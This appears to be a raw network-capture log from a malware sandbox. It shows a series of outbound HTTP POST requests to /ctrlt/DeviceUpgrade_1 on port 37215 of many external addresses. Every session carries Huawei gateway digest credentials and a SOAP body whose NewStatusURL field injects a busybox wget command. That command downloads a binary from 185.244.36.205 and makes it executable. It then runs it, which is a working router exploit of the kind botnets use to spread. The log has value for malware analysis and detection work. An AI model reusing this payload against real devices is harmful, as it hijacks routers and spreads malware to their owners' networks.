                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              807192.168.2.1551040121.166.156.21237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230432987 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              808192.168.2.154682094.47.124.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230453968 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              809192.168.2.1539854121.17.190.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230503082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              810192.168.2.1535110121.117.155.14237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230520964 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              811192.168.2.1543906121.180.219.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230545998 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              812192.168.2.1559990157.123.79.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230564117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              813192.168.2.1558830121.176.123.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230596066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              814192.168.2.154142031.255.187.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230622053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              815192.168.2.154533037.10.226.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230648041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              816192.168.2.1539976121.223.25.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230693102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
